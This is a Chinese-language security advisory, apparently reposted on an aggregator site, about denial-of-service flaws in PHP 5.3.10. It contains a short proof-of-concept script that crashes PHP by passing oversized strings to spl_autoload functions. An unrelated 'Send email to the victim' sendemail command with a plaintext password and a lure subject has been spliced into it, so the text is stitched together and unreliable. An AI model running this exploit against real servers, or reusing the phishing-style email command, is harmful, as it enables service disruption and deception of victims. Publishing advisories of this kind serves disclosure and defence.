發布日期：2012-06-03

更新日期：2012-06-05

受影響系統：

PHP PHP? 5.3.10

描述：

--------------------------------------------------------------------------------

BUGTRAQ? ID: 53763

PHP是一種HTML內嵌式的語言，PHP與微軟的ASP頗有幾分相似，都是一種在服務器端執行的嵌入HTML文檔的腳本語言，語言的風格有類似于C語言，現在被很多的網站編程人員廣泛的運用。

PHP 5.3.10在實現上存在多個遠程拒絕服務漏洞，成功利用后可造成應用崩潰。

*>

測試方法：

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

$buffer = str_repeat("A",9999);

spl_autoload_register($buffer);

$buff = str_repeat("A",9999);

spl_autoload($buff);

$buffer = str_repeat("A",9999);

spl_autoload_call($buffer);

Send email to the victim:

root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com \

-xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com

建議：

--------------------------------------------------------------------------------

廠商補丁：

PHP

---

目前廠商還沒有提供補丁或者升級程序，我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本：

總結

以上是生活随笔為你收集整理的php 5.3.3 漏洞,PHP 5.3.10多个拒绝服务漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。